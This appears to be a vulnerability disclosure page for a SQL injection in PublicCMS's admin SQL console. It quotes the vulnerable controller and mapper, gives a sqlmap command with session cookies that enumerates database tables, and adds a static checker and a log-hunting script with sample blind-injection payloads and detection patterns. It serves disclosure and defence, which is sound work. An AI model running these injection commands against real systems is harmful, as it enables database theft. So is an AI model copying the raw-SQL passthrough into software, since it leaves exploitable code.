CVE-2020-20914: There is a SQL Injection vulnerability that can dump the database · Issue #29 · sanluan/PublicCMS

SQL Injection vulnerability found in San Luan PublicCMS v.4.0 allows a remote, authenticated master-site administrator to execute arbitrary SQL statements via the sql parameter of the admin SQL console, including dumping the database.

Tags: sql, csrf, vulnerability, web, js

Where the SQL injection vulnerability appears in the code:
com.publiccms.controller.admin.sys.SysSiteAdminController

```java
@Csrf
public String execSql(@RequestAttribute SysSite site, @SessionAttribute SysUser admin, String sql, HttpServletRequest request,
        ModelMap model) {
    // Only an administrator of the master site may reach the SQL console.
    if (ControllerUtils.verifyCustom("noright", !siteComponent.isMaster(site.getId()), model)) {
        return CommonConstants.TEMPLATE_ERROR;
    }
    if (-1 < sql.indexOf(CommonConstants.BLANK_SPACE)) {
        // The first word of the submitted text only selects which mapper method runs;
        // the complete string is still handed to the mapper unmodified.
        String type = sql.substring(0, sql.indexOf(CommonConstants.BLANK_SPACE));
        try {
            if ("update".equalsIgnoreCase(type)) {
                model.addAttribute("result", sqlService.update(sql));
            } else if ("insert".equalsIgnoreCase(type)) {
                model.addAttribute("result", sqlService.insert(sql));
            } else if ("delete".equalsIgnoreCase(type)) {
                model.addAttribute("result", sqlService.delete(sql));
            } else {
                // Anything else (including select) is executed as a query and returned as JSON.
                model.addAttribute("result", JsonUtils.getString(sqlService.select(sql)));
            }
        } catch (Exception e) {
            model.addAttribute("error", e.getMessage());
        }
        model.addAttribute("sql", sql);
        // Every call is recorded in the operation log; the JSON content carries the submitted SQL.
        logOperateService.save(new LogOperate(site.getId(), admin.getId(), LogLoginService.CHANNEL_WEB_MANAGER,
                "execsql.site", RequestUtils.getIpAddress(request), CommonUtils.getDate(), JsonUtils.getString(model)));
    }
    return CommonConstants.TEMPLATE_DONE;
}
```

sqlService.update(sql) => SqlMapper.xml, where every statement is the caller's string spliced in with MyBatis `${}` substitution rather than bound as a `#{}` parameter:

```xml
<mapper namespace="com.publiccms.logic.mapper.tools.SqlMapper">
    <select id="select" parameterType="String" resultType="map">${sql}</select>
    <select id="query" parameterType="String" resultType="map">${sql}</select>
    <insert id="insert" parameterType="String">${sql}</insert>
    <update id="update" parameterType="String">${sql}</update>
    <delete id="delete" parameterType="String">${sql}</delete>
</mapper>
```
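The mapper above is the whole sink: a `${sql}` body means MyBatis pastes the caller's text into the statement, whereas `#{...}` would send it as a prepared-statement parameter. The following added example (written for this page, not PublicCMS code) is a small static checker for MyBatis mapper XML that reports every `${...}` inside a statement element and distinguishes a raw passthrough, where the entire statement is the substitution, from `${}` used for a fragment such as an ORDER BY column. It runs on the SqlMapper.xml quoted in the issue and on a constructed second mapper; `example.UserMapper` and its statements are assumptions for the contrast case.

```python
"""Static check for MyBatis mapper XML: report statements that build SQL with
${...} string substitution (text spliced into the statement) instead of #{...}
parameter binding (sent as a prepared-statement parameter).

Added example for this page; it is not PublicCMS code. The first mapper below
is the SqlMapper.xml quoted in the issue; the second is a constructed mapper
showing the two ways ${} typically appears.
"""
import re
import xml.etree.ElementTree as ET

# MyBatis elements whose text is emitted as SQL.
STATEMENT_TAGS = {"select", "insert", "update", "delete", "sql"}
SUBST_RE = re.compile(r"\$\{\s*([^}]+?)\s*\}")


def find_substitution_sinks(mapper_xml: str) -> list:
    """Return one finding per ${...} occurrence inside a statement element.

    'whole_statement' is True when the statement body is nothing but the
    substitution, i.e. the mapper is a raw passthrough for caller-supplied SQL
    (the PublicCMS case), as opposed to ${} used for a column or table name
    fragment, which is still injectable but narrower."""
    root = ET.fromstring(mapper_xml)
    namespace = root.get("namespace", "")
    findings = []
    for elem in root.iter():
        if elem.tag not in STATEMENT_TAGS:
            continue
        # itertext() also collects text nested in dynamic tags such as <if>/<where>.
        body = "".join(elem.itertext()).strip()
        for match in SUBST_RE.finditer(body):
            findings.append({
                "statement": f"{namespace}.{elem.get('id')}",
                "kind": elem.tag,
                "param": match.group(1),
                "whole_statement": body == match.group(0),
            })
    return findings


# Mapper quoted in the issue (CVE-2020-20914).
PUBLICCMS_SQL_MAPPER = """\
<mapper namespace="com.publiccms.logic.mapper.tools.SqlMapper">
  <select id="select" parameterType="String" resultType="map">${sql}</select>
  <select id="query" parameterType="String" resultType="map">${sql}</select>
  <insert id="insert" parameterType="String">${sql}</insert>
  <update id="update" parameterType="String">${sql}</update>
  <delete id="delete" parameterType="String">${sql}</delete>
</mapper>
"""

# Constructed contrast (assumed names): one bound parameter, one ORDER BY fragment.
CONSTRUCTED_MAPPER = """\
<mapper namespace="example.UserMapper">
  <select id="byId" parameterType="long" resultType="map">
    select id, name from sys_user where id = #{id}
  </select>
  <select id="list" resultType="map">
    select id, name from sys_user
    <if test="orderColumn != null">order by ${orderColumn}</if>
  </select>
</mapper>
"""


def main() -> None:
    for label, xml in (("PublicCMS SqlMapper.xml", PUBLICCMS_SQL_MAPPER),
                       ("constructed mapper", CONSTRUCTED_MAPPER)):
        print(f"== {label}")
        for f in find_substitution_sinks(xml):
            tag = "RAW SQL PASSTHROUGH" if f["whole_statement"] else "fragment"
            print(f"  {f['kind']:6} {f['statement']}: ${{{f['param']}}} ({tag})")


if __name__ == "__main__":
    main()
```

Running it lists all five PublicCMS statements as raw passthroughs and only the `orderColumn` fragment in the constructed mapper; the `#{id}` binding produces no finding. A passthrough hit is worth treating as a finding on its own, since no allow-list on the caller side can make an arbitrary-statement sink safe.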

sqlmap output:

```
[20:45:23] [INFO] the back-end DBMS is MySQL
web application technology: JSP
back-end DBMS: MySQL >= 5.0.12
```

View the tables in the PublicCMS database (the admin session cookies and the matching _csrf token are required, since the endpoint is annotated @Csrf):

```shell
python sqlmap.py -u "http://localhost:8080/publiccms/admin/sysSite/execSql.do?navTabId=sysSite/sql" --cookie "JSESSIONID=70640223FE44003BC029AAAB54D24BC8; PUBLICCMS_ADMIN=1_2df43cfb-9546-4cdb-8150-6482f1b028de;Hm_lvt_4674b425370d9f190347b297042ae0b1=1552053320" --data "_csrf=2df43cfb-9546-4cdb-8150-6482f1b028de&sql=111" --level 5 -D publiccms --tables
```
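Because execSql() writes a LogOperate row for every call, with the submitted SQL inside the JSON content, a run like the one above leaves a dense trail in the operation log. The following added example (written for this page, not PublicCMS code) hunts that trail for two signals a human at the console does not produce: a burst of execsql.site calls from one admin and source address, and statements that look like schema enumeration or time-based probes. The record keys (site_id, user_id, channel, operate, ip, create_date, content) are assumed names that follow the LogOperate constructor order in the controller; all records are constructed.

```python
"""Hunt for abuse of the PublicCMS admin SQL console in its operation log.

Added example for this page, not PublicCMS code. execSql() saves a LogOperate
row for every call whose content is the JSON of the model, so the submitted
"sql" survives in the audit trail. The dict keys below are assumed names
following the LogOperate constructor order in the controller; map them to the
real columns of your export. All records are constructed.
"""
import json
import re
from collections import defaultdict
from datetime import datetime, timedelta

OPERATE = "execsql.site"
# Artefacts sqlmap-style testing leaves in the submitted SQL: schema enumeration
# and time-based blind probes.
PROBE_RE = re.compile(r"information_schema|\bsleep\s*\(|\bbenchmark\s*\(", re.I)


def flag_execsql_abuse(records, burst_threshold=20, window=timedelta(minutes=5)):
    """Return one finding per (admin, source IP) that either fired at least
    burst_threshold execsql calls inside any `window`, or submitted SQL that
    matches PROBE_RE."""
    by_actor = defaultdict(list)
    for rec in records:
        if rec["operate"] != OPERATE:
            continue
        sql = json.loads(rec["content"]).get("sql", "")
        when = datetime.fromisoformat(rec["create_date"])
        by_actor[(rec["user_id"], rec["ip"])].append((when, sql))

    findings = []
    for (user_id, ip), events in by_actor.items():
        events.sort()
        reasons = []
        # Largest number of calls inside any sliding window of length `window`.
        peak, start = 0, 0
        for end, (when, _) in enumerate(events):
            while when - events[start][0] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= burst_threshold:
            reasons.append(f"{peak} execsql calls within {window}")
        probes = [sql for _, sql in events if PROBE_RE.search(sql)]
        if probes:
            reasons.append(f"{len(probes)} probe-like statements, e.g. {probes[0]!r}")
        if reasons:
            findings.append({"user_id": user_id, "ip": ip, "reasons": reasons})
    return findings


def _row(user_id, ip, when, sql, operate=OPERATE, site_id=1):
    """Build one constructed LogOperate-like record (assumed key names)."""
    content = json.dumps({"sql": sql, "result": 0}) if operate == OPERATE else "{}"
    return {"site_id": site_id, "user_id": user_id, "channel": "web_manager",
            "operate": operate, "ip": ip, "create_date": when.isoformat(),
            "content": content}


BASE = datetime(2019, 3, 8, 20, 45, 0)
# Constructed audit trail: a few hand-typed admin statements, one unrelated
# operation, then a 26-call burst from another address with sqlmap-like payloads.
SAMPLE_RECORDS = [
    _row(1, "10.0.0.5", BASE, "select count(*) from sys_user"),
    _row(1, "10.0.0.5", BASE + timedelta(hours=1), "update sys_site set name='demo' where id=1"),
    _row(1, "10.0.0.5", BASE + timedelta(hours=2), "", operate="login"),
]
for i in range(25):
    payload = "111 AND SLEEP(5)" if i % 5 == 0 else f"111 AND {i}={i}"
    SAMPLE_RECORDS.append(_row(1, "203.0.113.7", BASE + timedelta(seconds=i), payload))
SAMPLE_RECORDS.append(_row(1, "203.0.113.7", BASE + timedelta(seconds=40),
                           "SELECT table_name FROM information_schema.tables"))


if __name__ == "__main__":
    for finding in flag_execsql_abuse(SAMPLE_RECORDS):
        print(finding)
```

Only the 203.0.113.7 session is flagged, on both signals. The probe pattern alone is a low-confidence signal (an administrator may legitimately query information_schema once), so keep the burst check as the primary trigger and tune `burst_threshold` to how the console is actually used.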
